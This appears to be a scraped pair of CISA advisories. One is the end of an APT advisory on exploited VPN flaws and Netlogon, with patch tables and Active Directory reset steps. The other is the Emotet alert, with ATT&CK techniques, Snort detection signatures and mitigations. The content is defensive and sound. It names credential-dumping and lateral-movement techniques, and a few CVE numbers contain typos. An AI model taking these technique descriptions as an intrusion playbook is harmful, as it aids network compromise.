  • Pulse Secure CVE-2019-11510
  • Palo Alto Networks CVE-2020-2021
  • F5 BIG-IP CVE-2020-5902
FortiGuard ForitOS SSL VPN CVE-2018-13379

CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.

MobileIron Core & Connector Vulnerability CVE-2020-15505

CVE-202-15505 is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Privilege Escalation

Post initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain Valid Account [T1078] credentials from AD servers.

Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472

CVE-2020-1472 is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory. This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (Valid Accounts: Domain Accounts [T1078.002]). Malicious actors can leverage this vulnerability to compromise other devices on the network (Lateral Movement [TA0008]).

Persistence

Once system access has been achieved, the APT actors use abuse of legitimate credentials (Valid Account [T1078]) to log in via VPN or Remote Access Services [T1133] to maintain persistence.

Mitigations

Organizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an “assume breach” mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.

Keep Systems Up to Date

Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.

Table 1: Patch information for exploited CVEs

Vulnerability Vulnerable Products Patch Information CVE-2018-13379
  • FortiOS 6.0
  • FortiOS 5.6  
  • FortiOS 5.4
CVE-2019-19781
  • Citrix Application Delivery Controller
  • Citrix Gateway
  • Citrix SDWAN WANOP
CVE-2020-5902
  • Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)
CVE-2020-11510
  • Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15
  • Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15
CVE-2020-15505
  • MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0  
  • Sentry versions 9.7.2 and earlier, and 9.8.0;  
  • Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier
CVE-2020-1631
  • Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1
CVE-2020-2021
  • PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)
CVE-2020-1472
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903  (Server Core installation)
  • Windows Server, version 1909  (Server Core installation)
  • Windows Server, version 2004   (Server Core installation)
Comprehensive Account Resets

If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure hosted AD instances.

Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.

It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.

  1. Create a temporary administrator account, and use this account only for all administrative actions
  2. Reset the Kerberos Ticket Granting Ticket (krbtgt) password; this must be completed before any additional actions and a second reset will take place in step 5
  3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
    1. User accounts (forced reset with no legacy password reuse)
    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])
    3. Service accounts
    4. Directory Services Restore Mode (DSRM) account
    5. Domain Controller machine account
    6. Application passwords
  5. Reset the krbtgt password again
  6. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  7. Reboot domain controllers
  8. Reboot all endpoints

The following accounts should be reset:

  • AD Kerberos Authentication Master (2x)
  • All Active Directory Accounts
  • All Active Directory Admin Accounts
  • All Active Directory Service Accounts
  • All Active Directory User Accounts
  • DSRM Account on Domain Controllers
  • Non-AD Privileged Application Accounts
  • Non-AD Unprivileged Application Accounts
  • Non-Windows Privileged Accounts
  • Non-Windows User Accounts
  • Windows Computer Accounts
  • Windows Local Admin
VPN Vulnerabilities

Implement the following recommendations to secure your organization’s VPNs:

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices. Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.
  • Implement multi-factor authentication (MFA) on all VPN connections to increase security. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.

Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. How to protect your organization against VPN vulnerabilities:

  • Audit configuration and patch management programs.
  • Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).
  • Implement MFA, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Keep software up to date. Enable automatic updates, if available.  

To secure your organization’s Netlogon channel connections:

  • Update all Domain Controllers and Read Only Domain Controllers. On August 11, 2020, Microsoft released software updates to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).
  • Monitor for new events, and address non-compliant devices that are using vulnerable Netlogon secure channel connections.
  • Block public access to potentially vulnerable ports, such as 445 (SMB) and 135 (RPC).

To protect your organization against this CVE, follow advice from Microsoft, including:

  • Update your domain controllers with an update released August 11, 2020 or later.
  • Find which devices are making vulnerable connections by monitoring event logs.
  • Address non-compliant devices making vulnerable connections.
  • Enable enforcement mode to address CVE-2020-1472 in your environment.
How to uncover and mitigate malicious activity
  • Collect and remove for further analysis:
    • Relevant artifacts, logs, and data
  • Implement mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.
  • Consider soliciting incident response support from a third-party IT security organization to:
    • Provide subject matter expertise and technical support to the incident response,
    • Ensure that the actor is eradicated from the network, and
    • Avoid residual issues that could result in follow-up compromises once the incident is closed
Resources Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.

For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

  DISCLAIMER   This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

 

Revisions
  • October 9, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

2020. október 6.

AA20-280A: Emotet Malware

Original release date: October 6, 2020
Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC).

Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.

To secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.

Technical Details

Emotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]).The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (Brute Force: Password Guessing [T1110.001], Valid Accounts: Local Accounts [T1078.003], Remote Services: SMB/Windows Admin Shares [T1021.002]).

Emotet is difficult to combat because of its “worm-like” features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.

Since July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved HTTP POST requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (Application Layer Protocol: Web Protocols [T1071.001]).

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR

Traffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (Exploitation of Remote Services [T1210]). Figure 1 lays out Emotet’s use of enterprise techniques.

 

Figure 1: MITRE ATT&CK enterprise techniques used by Emotet

  Timeline of Activity

The following timeline identifies key Emotet activity observed in 2020.

  • February: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[1]
  • July: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[2]
  • August:
    • Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[3]  
    • Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. Significant changes included:
      • Emotet delivering Qbot affiliate partner01 as the primary payload and
      • The Emotet mail sending module’s ability to deliver benign and malicious attachments.[4]
    • CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.
  • September:
    • Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[5],[6],[7],[8]
    • Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to “view” the documents—an action which actually enables the delivery of malware.[9]
    • Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain—using a spoofed identity—and attaching a malicious document to trick recipients into opening the file.[10]
MITRE ATT&CK Techniques

According to MITRE, Emotet uses the ATT&CK techniques listed in table 1.

Table 1: Common exploit tools

Technique

Use

OS Credential Dumping: LSASS Memory [T1003.001]

Emotet has been observed dropping password grabber modules including Mimikatz.

Remote Services: SMB/Windows Admin Shares [T1021.002]

Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.

Obfuscated Files or Information [T1027]

Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, cmd.exe arguments, and PowerShell scripts.

Obfuscated Files or Information: Software Packing [T1027.002]

Emotet has used custom packers to protect its payloads.

Network Sniffing [T1040]

Emotet has been observed to hook network APIs to monitor network traffic.

Exfiltration Over C2 Channel [T1041]

Emotet has been seen exfiltrating system information stored within cookies sent within a HTTP GET request back to its command and control (C2) servers.

Windows Management Instrumentation [T1047]

Emotet has used WMI to execute powershell.exe.

Process Injection: Dynamic-link Library Injection [T1055.001]

Emotet has been observed injecting in to Explorer.exe and other processes.

Process Discovery [T1057]

Emotet has been observed enumerating local processes.

Command and Scripting Interpreter: PowerShell [T1059.001]

Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]

Emotet has used cmd.exe to run a PowerShell script.

Command and Scripting Interpreter: Visual Basic [T1059.005]

Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.

Valid Accounts: Local Accounts [T1078.003]

Emotet can brute force a local admin password, then use it to facilitate lateral movement.

Account Discovery: Email Account [T1087.003]

Emotet has been observed leveraging a module that can scrape email addresses from Outlook.

Brute Force: Password Guessing [T1110.001]

Emotet has been observed using a hard-coded list of passwords to brute force user accounts.

Email Collection: Local Email Collection [T1114.001]

Emotet has been observed leveraging a module that scrapes email data from Outlook.

User Execution: Malicious Link [T1204.001]

Emotet has relied upon users clicking on a malicious link delivered through spearphishing.

User Execution: Malicious File [T1204.002]

Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.

Exploitation of Remote Services [T1210]

Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE (MS17-010) to achieve lateral movement and propagation.

Create or Modify System Process: Windows Service [T1543.003]

Emotet has been observed creating new services to maintain persistence.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.

Scheduled Task/Job: Scheduled Task [T1053.005]

Emotet has maintained persistence through a scheduled task.

Unsecured Credentials: Credentials In Files [T1552.001]

Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

Emotet has been observed dropping browser password grabber modules.

Archive Collected Data [T1560]

Emotet has been observed encrypting the data it collects before sending it to the C2 server.

Phishing: Spearphishing Attachment [T1566.001]

Emotet has been delivered by phishing emails containing attachments.

Phishing: Spearphishing Link [T1566.002]

Emotet has been delivered by phishing emails containing links.

Non-Standard Port [T1571]

Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure.

Encrypted Channel: Asymmetric Cryptography [T1573.002]

Emotet is known to use RSA keys for encrypting C2 traffic.

Detection Signatures

MS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords"; content:"POST"; http_method; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; fast_pattern; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|"; http_client_body; content:!"------WebKitFormBoundary"; http_client_body; content:!"Cookie|3a|"; pcre:"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)

CISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. Note: Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.

alert tcp any any -> any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-content/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-content/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:<17; classtype:http-uri; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-admin/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-admin/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:<15; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; classtype:http-uri; metadata:service http;)

Mitigations

CISA and MS-ISAC recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

  • Block email attachments commonly associated with malware (e.g.,.dll and .exe).
  • Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
  • Implement Group Policy Object and firewall rules.
  • Implement an antivirus program and a formalized patch management process.
  • Implement filters at the email gateway, and block suspicious IP addresses at the firewall.
  • Adhere to the principle of least privilege.
  • Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.
  • Segment and segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Enforce multi-factor authentication.
  • Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
  • Enable a firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to suspicious or risky sites.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
  • Scan all software downloaded from the internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate access control lists.
  • Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.
  • See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures.
  • See the joint CISA and MS-ISAC Ransomware Guide on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources References Revisions
  • October 6, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.